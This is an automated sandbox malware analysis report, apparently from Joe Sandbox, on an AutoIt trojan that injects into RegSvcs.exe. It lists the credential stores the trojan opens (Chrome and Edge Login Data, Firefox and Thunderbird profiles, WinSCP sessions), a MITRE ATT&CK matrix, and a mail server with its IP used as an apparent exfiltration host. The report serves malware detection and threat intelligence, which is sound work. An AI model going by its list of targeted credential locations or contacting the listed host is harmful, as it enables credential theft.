                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AC886B cpuid 0_2_00AC886B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: GetLocaleInfoA,3_2_00417A20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AD50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00AD50D7
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AE2230 GetUserNameW,0_2_00AE2230
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AD418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00AD418A
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00AA4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00AA4AFE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4151126152.000000000347C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7516, type: MEMORYSTR
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: GkYUK8VCrO.exeBinary or memory string: WIN_81
                Source: GkYUK8VCrO.exeBinary or memory string: WIN_XP
                Source: GkYUK8VCrO.exeBinary or memory string: WIN_XPe
                Source: GkYUK8VCrO.exeBinary or memory string: WIN_VISTA
                Source: GkYUK8VCrO.exeBinary or memory string: WIN_7
                Source: GkYUK8VCrO.exeBinary or memory string: WIN_8
                Source: GkYUK8VCrO.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4151126152.000000000347C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7516, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4151126152.000000000347C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7516, type: MEMORYSTR
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: RegSvcs.exe, 00000003.00000002.4152521685.00000000045B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: RegSvcs.exe, 00000003.00000002.4152521685.00000000046B7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004737000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004757000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004797000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: RegSvcs.exe, 00000003.00000002.4152521685.00000000046D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004657000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004597000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004431000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: RegSvcs.exe, 00000003.00000002.4152521685.00000000045F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004677000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004617000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: RegSvcs.exe, 00000003.00000002.4152521685.00000000046F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B16596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00B16596
                Source: C:\Users\user\Desktop\GkYUK8VCrO.exeCode function: 0_2_00B16A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00B16A5A
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                121
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                11
                Disable or Modify Tools
                2
                OS Credential Dumping
                2
                System Time Discovery
                1
                Remote Desktop Protocol
                11
                Archive Collected Data
                2
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Native API
                2
                Valid Accounts
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                221
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol2
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
                Valid Accounts
                2
                Obfuscated Files or Information
                1
                Credentials in Registry
                2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                1
                Non-Standard Port
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                Access Token Manipulation
                1
                Software Packing
                NTDS148
                System Information Discovery
                Distributed Component Object Model221
                Input Capture
                1
                Remote Access Software
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                Process Injection
                1
                DLL Side-Loading
                LSA Secrets251
                Security Software Discovery
                SSH4
                Clipboard Data
                2
                Non-Application Layer Protocol
                Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                Valid Accounts
                Cached Domain Credentials121
                Virtualization/Sandbox Evasion
                VNCGUI Input Capture23
                Application Layer Protocol
                Data Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items121
                Virtualization/Sandbox Evasion
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery
                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1465576 Sample: GkYUK8VCrO.exe Startdate: 01/07/2024 Architecture: WINDOWS Score: 100 24 mail.fasmacopy.gr 2->24 26 api.ipify.org 2->26 36 Snort IDS alert for network traffic 2->36 38 Found malware configuration 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 8 other signatures 2->42 8 GkYUK8VCrO.exe 4 2->8         started        signatures3 process4 signatures5 44 Binary is likely a compiled AutoIt script file 8->44 46 Switches to a custom stack to bypass stack traces 8->46 11 GkYUK8VCrO.exe 2 8->11         started        14 RegSvcs.exe 8->14         started        process6 signatures7 48 Binary is likely a compiled AutoIt script file 11->48 50 Writes to foreign memory regions 11->50 52 Maps a DLL or memory area into another process 11->52 16 RegSvcs.exe 15 2 11->16         started        54 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->54 process8 dnsIp9 20 mail.fasmacopy.gr 79.170.44.32, 49731, 49739, 49740 GODADDYDE United Kingdom 16->20 22 api.ipify.org 104.26.12.205, 443, 49730 CLOUDFLARENETUS United States 16->22 28 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->28 30 Tries to steal Mail credentials (via file / registry access) 16->30 32 Contains VNC / remote desktop functionality (version string found) 16->32 34 3 other signatures 16->34 signatures10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                GkYUK8VCrO.exe42%ReversingLabsWin32.Trojan.Autoit
                GkYUK8VCrO.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://api.ipify.org/0%URL Reputationsafe
                https://api.ipify.org0%URL Reputationsafe
                https://account.dyn.com/0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                http://mail.fasmacopy.gr0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                mail.fasmacopy.gr
                79.170.44.32
                truetrue
                  unknown
                  api.ipify.org
                  104.26.12.205
                  truefalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                    • URL Reputation: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://api.ipify.orgRegSvcs.exe, 00000003.00000002.4151126152.0000000003431000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://account.dyn.com/RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://mail.fasmacopy.grRegSvcs.exe, 00000003.00000002.4151126152.00000000034DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.000000000369F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.0000000003580000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.000000000373D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.0000000003959000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.00000000037E5000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.4151126152.0000000003431000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    104.26.12.205
                    api.ipify.orgUnited States
                    13335CLOUDFLARENETUSfalse
                    79.170.44.32
                    mail.fasmacopy.grUnited Kingdom
                    20773GODADDYDEtrue
                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1465576
                    Start date and time:2024-07-01 20:24:20 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 8m 53s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:GkYUK8VCrO.exe
                    renamed because original name is a hash value
                    Original Sample Name:7d50650cd2ba63482d4caf875ae65a8e.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@7/6@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:
                    • Successful, ratio: 96%
                    • Number of executed functions: 60
                    • Number of non-executed functions: 263
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • VT rate limit hit for: GkYUK8VCrO.exe
                    TimeTypeDescription
                    14:25:18API Interceptor12832277x Sleep call for process: RegSvcs.exe modified
                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    104.26.12.205SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exeGet hashmaliciousConti, PureLog Stealer, Targeted RansomwareBrowse
                    • api.ipify.org/
                    482730621.exeGet hashmaliciousStealitBrowse
                    • api.ipify.org/?format=json
                    482730621.exeGet hashmaliciousStealitBrowse
                    • api.ipify.org/?format=json
                    Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                    • api.ipify.org/?format=json
                    Sky-Beta.exeGet hashmaliciousStealitBrowse
                    • api.ipify.org/?format=json
                    SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                    • api.ipify.org/
                    lods.cmdGet hashmaliciousRemcosBrowse
                    • api.ipify.org/
                    79.170.44.32RFQ_4155965-EU2406.xlsxGet hashmaliciousAgentTesla, PureLog StealerBrowse
                      ltd93En22P.exeGet hashmaliciousAgentTeslaBrowse
                        ejXrW4Jf9o.exeGet hashmaliciousAgentTeslaBrowse
                          U39qqK8E7o.exeGet hashmaliciousAgentTeslaBrowse
                            RFQ-P023102417.docGet hashmaliciousAgentTeslaBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              api.ipify.orgPO 4500005168 NIKOLA.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.13.205
                              rQoutation.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 104.26.13.205
                              F46VBJ6Yvy.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.13.205
                              8w5wHh755H.exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.74.152
                              gB49zgUhr8.exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.74.152
                              AdhP1WMUi5.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.12.205
                              doc -scan file.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.13.205
